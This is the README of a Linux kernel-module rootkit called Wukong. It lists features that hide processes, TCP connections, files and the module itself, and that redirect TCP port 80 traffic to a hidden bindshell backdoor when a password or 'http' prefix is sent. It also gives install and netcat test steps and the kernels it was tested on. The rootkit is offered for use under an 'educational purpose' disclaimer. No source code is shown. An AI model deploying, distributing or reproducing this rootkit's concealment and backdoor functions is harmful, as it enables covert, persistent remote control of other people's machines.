Wukong: a LKM rootkit for Linux kernel 2.6.x, 3.x and 4.x
Note:
This kernel rootkit is just for educational purpose and it shouldn't be used for any illegal activities, use this at your own risk.
Function
1. Hide Linux Process.
2. Hide TCP connection.
3. Hide File/Directory.
4. Hide wukong.ko.
5. Redirect TCP connection to backdoor server by using the specific confidential password.
2. Test step:
a. on server
cd wukong/
sudo ./install.pl
sudo nc -k -l 80
b. on client
nc 1.1.1.1 80
http
ifconfig
PS:The connection will be redirected to bindshell
nc 1.1.1.1 80
111111
PS: a rst will be received.
nc 1.1.1.1 80
111111
aaaaaa
PS: The connection will be connected with tcp 80.
3. Result:
a. Bindshell file is hidden.
b. Tcp 8000 connection is hidden.
c. Bindshell process is hidden
d. wukong.ko is hidden
e. If "http" is the first four bytes to TCP 80, connection will be established with bindshell.
Tested OS:
CentOS-5.5-i386-bin-DVD.iso
Linux 2.6.18-408.el5 #1 SMP Tue Jan 19 09:13:33 EST 2016 i686 i686 i386 GNU/Linux
CentOS-5.5-x86_64-bin-DVD
Linux 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
ubuntu-14.04.2-desktop-i386.iso
Linux 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
ubuntu-14.04.2-desktop-amd64.iso
Linux 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
ubuntu-14.04.3-desktop-i386.iso
Linux 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
ubuntu-14.04.3-desktop-amd64.iso
Linux 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
ToDo:
Do performance tuning, make it can work on Linux server with large traffic.
Adding more features.